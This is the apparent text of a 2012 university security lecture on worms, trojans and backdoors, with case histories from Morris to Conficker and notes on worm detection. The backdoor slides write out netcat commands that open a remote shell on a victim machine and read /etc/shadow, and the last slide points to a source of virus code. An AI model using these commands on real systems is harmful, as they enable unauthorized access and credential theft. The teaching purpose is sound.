1

CSCD 434Spring 2012

Lecture 8Attacks

Worms, Trojans, Backdoors

Introduction• Today, cover malware–Worms, Trojan Horses/ Backdoors– Define Rootkits, viruses - cover later

– Nearly all of these infect computers via the network• Email counts as a form of remote infection

– If you do decide to write one for fun don’t release it … could wind up in jail

2

3

Definitions• Worm– Replicates itself, stand alone program,

spreads via network• Virus– Program that attaches itself to another

program– Replicates itself, program must be run

• Trojan horse– Program that pretends to do one thing

but does something behind the scenes• Rootkit - A root kit is a component that

uses stealth to maintain a persistent and undetectable presence on the machine

Almost 30 years of Malware

5

Purpose of Malware

• What is the main purpose of most malware?

• Profit!!!!• Modern malware is a for-profit, big-business

undertaking• Online criminals invest significant amounts of

money and time in more efficient malware and better malware distribution mechanisms because financial rewards can be enormous

6

Purpose of Malware

• How is it distributed these days?• Malware has been part of computing for

decades• In the 1990s, Floppy Disks it got onto

your computer or network when you stuck an infected floppy disk into your drive,

• Then, Email becoming more prevalent, hackers designed malware to spread as infected email attachments

• Today,Internet is a fantastic distribution mechanism for malware

7

Worms

Worms

• A worm is self-replicating software designed to spread through the network

Typically, exploit security flaws in widely used services ... mostly buffer overflows

Causes massive damage Launch DDOS attacks, Install bot networks Access sensitive information Used for spam

Worms

• Worm vs Virus vs Trojan horse A virus is code embedded in a file or

program Viruses and Trojan horses rely on

humans• Human must access file or run program

Worms are often self-contained and may spread autonomously ... and they do!• Can also spread via email, Internet

Worms Spread?

• Copy itself directly across the network• Read your address book – Emails itself to everyone in your address

book– How easy is it to do this?–Microsoft outlook – was trivial < 5 lines of code to send out an email – Can cause outlook to send emails without

user awareness– Reason why so many worms for Outlook

Historical Worm Examples

12

Morris Worm• First appeared in 1988• Purpose – Determine where it could spread– Spread its infection– Remain undiscovered

• Morris claimed his worm had a bug…• Morris worm tried to re-infect

systems– Led to resource exhaustion

13

Morris WormHow did it spread? •Tried to obtain access to machine by…– User account password guessing– Exploited buffer overflow in fingerd– Exploited debug code in sendmail

•Flaws in fingerd and sendmail were well-known at the time, but not widely patched

14

Morris Worm

• Once access had been obtained to machine…

• “Bootstrap loader” sent to victim– Consisted of 99 lines of C code

• Victim machine compiled and executed code

• Bootstrap loader fetched the rest of worm

15

Morris Worm• Why was it successful?– If transmission of worm was

interrupted, all code was deleted– Code encrypted when downloaded– Code deleted after decrypting and

compiling–When running, worm regularly

changed its name and process identifier (PID)

I-Love-You Worm

• e-mail worm arrived May 4, 2000,

subject of "ILOVEYOU" and an attachment– LOVE-LETTER-FOR-YOU.TXT.vbs

I-Love-You Worm

• LOVE-LETTER-FOR-YOU.TXT.vbs– Upon opening attachment, software sent

copy of itself to everyone in user's address list, posing as user• Overwrote all these files types:• VBS, VBE, JS, JSE, CSS, WSH, SCT, HTA, JPG,

JPEG, MP3, and MP2• Overwritten files contain worm's body and

extensions changed to vbs

I-Love-You Worm How did it spread? • Sent a copy of itself to first 50 addresses in

Windows Address Book used by Microsoft Outlook

•Why was it successful?• Took advantage of a Microsoft algorithm for

hiding file extensions. Windows had begun hiding extensions by default

• Entice users to open the attachment, ensure continued propagation

• Exploited systemic weaknesses in design of Microsoft Outlook and Microsoft Windows which led to unused features easily running malicious code capable of achieving complete access to the operating system,

slide 19

Code Red I July 13, 2001: First worm of modern era Exploited buffer overflow in Microsoft’s Internet Information Server (IIS)

How did it spread? 1st through 20th of each month: Spread

Find new targets by random scan of IP address space Spawn 99 threads to generate addresses and look for

IIS Creator forgot to seed random number generator,

and every copy scanned same set of addresses ... Oops

21st through the end of each month: Attack

Defaced websites with “HELLO! Welcome to http://www.worm.com! Hacked by Chinese!”

slide 20

Code Red I v2

• July 19, 2001: Same codebase as Code Red I, but fixed the bug in random IP address generation– Compromised all vulnerable IIS servers on

Internet– Fast spread• Scanned address space grew exponentially• 350,000 hosts infected in 14 hours!!

• Payload: distributed packet flooding (denial of service) attack on www.whitehouse.gov

slide 21

• August 4, 2001: Same IIS vulnerability, completely different code, kills Code Red I– Known as “Code Red II” because of

comment in code– Worked only on Windows 2000, crashed NT

• Scanning algorithm preferred nearby addresses– Chose addresses from same class A with

probability ½, same class B with probability 3/8, and randomly from the entire Internet with probability 1/8

• Payload: installed root backdoor in IIS servers for unrestricted remote access

• Died by design on October 1, 2001

Code Red II

22

Code Red 2 kills off Code

Red 1

Code Red 2 settles into

weekly pattern

Nimda enters the ecosystem

Code Red 2 dies off as

programmed

CR 1 returns thanksto bad clocks

Slides: Vern Paxson

SQL Slammer• Another modern worm, SQL Slammer,

January 2003– Although titled "SQL slammer worm",

program didn't use SQL language• How did it work?• It exploited a buffer overflow bug in

Microsoft's SQL Server and Desktop Engine database products, for which a patch had been released six months earlier • Affected Microsoft SQL 2000

– Vulnerable population, 75,000 machines infected in less than 10 minutes

http://en.wikipedia.org/wiki/SQL_slammer_worm

slide 24

05:29:00 UTC, January 25, 2003[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]

slide 25

30 Minutes Later

Size of circles is logarithmic inthe number of infected machines

[from Moore et al. “The Spread of the Sapphire/Slammer Worm”]

slide 26

Secret of Slammer’s Speed

• Why was it successful?• Old-style worms (Code Red) spawn a new

thread which tries to establish TCP connection• If successful, send a copy of itself over TCP–Limited by latency of the network

• Slammer, improved concept, connectionless UDP worm–No connection establishment, simply sent 404-byte UDP packet to randomly generated IP addresses–Limited only by bandwidth of the network

Modern Day Worms

Modern WormsDon't Just Spread

• Old-Style Worms–Mostly to spread, very noticeable in attacks– How fast and far can we go?– Sometimes, dropped other malware to

maintain access

• Modern Worms – Stealthier– Always have payload of more malware–Many infection vectors - not just one– Use resources of machine, glean user

information

Modern WormsDon't Just Spread

• These worms spread more subtly,–Without making noise– Symptoms don't appear immediately, infected

computer can sit dormant for a long time– If it were a disease,• More like syphilis, whose symptoms may be

mild or disappear altogether,• Eventually come back years later and eat

your brain !!– Bruce Schneir http://www.schneier.com/blog/archives/2007/10/

the_storm_worm.html

slide 30

Storm Worm 2007• How did it spread?• Spread by cleverly designed spam campaign– Arrived as an email with catchy subject• First instance:“230 dead as storm batters

Europe” • Other examples: “Condoleeza Rice has

kicked German Chancellor”, “Radical Muslim drinking enemies’s blood”, “Saddam Hussein alive!”, “Fidel Castro dead”, etc.

• Attachment or URL with malicious payload– FullVideo.exe, MoreHere.exe, ReadMore.exe, etc.– Also masquerade as flash postcards

• Once opened,• Installs trojan (wincom32) and rootkit !!!

slide 31

Storm Worm Characteristics

• Infected host joined Botnet• Obfuscated P2P control structure– Interacted with peers via eDonkey protocol

• Obfuscated code, anti-debugging defenses– Goes into infinite loop if detects VMware or

Virtual PC– Large number of spurious probes, evidence

of external analysis, triggers distributed DoS attack

• Infection Estimates• Between 1 million and 50 million computers

infected worldwide

Storm Worm Characteristics

• Storm's Payload

• Morphs every 30 minutes or so,– Typical AV (antivirus) and IDS techniques less

effective --- use code signatures to detect

• Storm e-mail also changes all time, leveraging social engineering techniques. – There are always new subject lines and new

enticing text

• Storm began attacking anti-spam sites focused on identifying it -- spamhaus.org, 419eater and so on -- and the personal website of Joe Stewart, who published an analysis of Storm

Conficker Wormhttp://www.confickerworkinggroup.org/wiki/pmwiki.php/ANY/

InfectionDistribution

• Conficker.A was first detected on 21 November 2008 and exploited MS08-067, below is infection as of 4/1/2009

MS08-067 Server Service Buffer OverflowThis service facilitates file, print, and named-pipe sharing over the network for Windows-based computersSuccessful exploitation may result in execution of arbitrary code on the target host with System privileges!!!!

Conficker Worm

• Conficker.B, detected in February 2009, added ability to spread through network shares and removable storage devices– USB drives and AutoRun function in Windows

• Conficker.C, shuts down security services, blocks computers from connecting to security Web sites, and downloads a Trojan

• Also reaches out to other infected computers via peer-to-peer networking– Includes a list of 50,000 different domains, 500

will be contacted by the infected computer on April 1 to receive updated copies or other malware or instructions

Conficker Worm

• Where did Conficker come from?– Ties to Russian Business Network, not

sure

• Currently Still a problemhttp://www.confickerworkinggroup.org/

wiki/pmwiki.php/ANY/InfectionTracking

Worm Propagation Methods• Scanning worms - Worm chooses “random”

address• Coordinated scanning - Different worm

instances scan different addresses

• Meta-server worm Ask server for hosts to infect

• Topological worm - Uses information from infected hosts– Web server logs, email address books,

config files, SSH “known hosts”f

• Contagion worm - Propagate parasitically along with normally initiated communication

37

Worm Signature

• Monitor network and look for strings common to traffic with worm-like behavior

Signatures can then be used for content filtering

Slide: S Savage

38

Content Sifting

• Assume there exists some (relatively) unique invariant bitstring W across all instances of a particular worm

• Two Consequences

Content Prevalence: W will be more common in traffic than other bitstrings of the same length

Address Dispersion: the set of packets containing W will address a disproportionate number of distinct sources and destinations

• Content sifting: find W’s with high content prevalence and high address dispersion and drop that traffic

39

Malicious Code

• Using Worms transformed into Botnets

• Hundreds of thousands of vulnerable computers are being used to launch spam campaigns• 70 percent of all spam is now sent this way,

according to anti-spam firm Message Labs Inc.

• Perhaps 6 to 7 billion spam messages are routed through hacked home computers

40

Malicious Code• Attack Trends– Crossbreeding• Combo Malware raises threat, treats each

element as a building block• Malware developer of today constructs an

attack tool by selecting various blocks and combining them in a single piece of code–Worms used to spread backdoors– Bugbear.b worm, which appeared in

2003 featured several backdoors.– Blaster worm and Sobig.F virus also

installed backdoors

41

Malicious Code

• Attack Trends• Combo Malware ... far more likely to find

some hole in your defenses than single-trick malware• Fight combo malware, you need more than

your signature-based AV engine loaded on servers and desktops• You need to think in terms of holistic defense,

addressing multiple vulnerability points, hardening your overall network and preparing for the worst

Ed Skoudis

42

Maintaining Access

• Once you have infected computer, • Gotten in through a vulnerability

• System or Human• Maintain Access Needs Stealth way back in ..

• Install a remote control backdoor to victim system• Backdoor allows attacker access in the

future

43

Backdoors

• What is a Backdoor?– Once penetrate machine through one

of the ways we talked about previously–Want to install a future access point– A backdoor is a way in to the system

that allows an attacker admission whenever they want

44

Backdoors• Example– Netcat tool• Claim that netcat is one of the most popular

backdoor tools in use today• Netcat when run on victim machine can be

configured to listen on any TCP port – Executes any program for traffic coming

in on that port–Will have same permission as account

from which netcat was executed– Can send it data and have it executed on

victim machine• Assume attacker has gained access to a

victim machine and wants to set up a command-shell backdoor

45

BackdoorsLinux Example

$ nc –l –p 12345 –e /bin/sh (backdoor on victim_machine)

Runs the netcat program which listens on TCP port 12345

and executes shell with data sent on port 12345

$ nc victim_machine 12345 (client on attacker machine)

cmd: ls (will list contents of directory from victim machine)

sensitive_documents tools games

cmd: cat /etc/shadow (only works if user on victim has root)

46

Backdoors

• Example - Windows Machine• Can also use netcat on Windows machine• Instead of /bin/sh will use cmd.exe

C:\> nc –l –p 12345 –e cmd.exe (on victim machine)

Similar results!

47

Backdoors and Trojans

•Trojans Classic example:• Replace /bin/login - lets users log in to

system but saves passwords for later analysis

•Trojan Backdoor• Combination of a backdoor hiding inside of

a trojan program

48

Summary

–Malware – Viruses, Worms and combinations including Trojan backdoor components are rampant– Continues to be a serious problem for

everyone using the Internet– Not just teenagers looking to brag

anymore• More and more the proliferation appears to

be related to the business of spamming• Resources http://vx.netlux.org/ good for code examples

49

The End